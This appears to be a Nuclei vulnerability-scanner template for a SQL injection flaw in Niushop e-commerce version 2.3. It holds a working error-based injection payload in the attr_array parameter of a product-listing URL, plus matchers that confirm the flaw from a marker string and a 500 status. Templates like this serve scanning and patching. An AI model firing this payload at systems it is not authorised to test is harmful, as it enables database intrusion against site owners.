id: niushop-sqli

info:
  name: Niushop电子商城系统2.3版本前台SQL注入
  author: Str1am
  severity: high
  reference: https://xz.aliyun.com/t/6758
  tags: niushop,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27)%20AND%20(SELECT%208036%20FROM(SELECT%20COUNT(*),CONCAT(0x7176766b71,(SELECT%20(ELT(8036=8036,1))),0x7171786a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(%27uRUI%27=%27uRUI&spec_array[]=9"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        words:
          - "qvvkq1qqxjq1"
        part: body
        condition: and
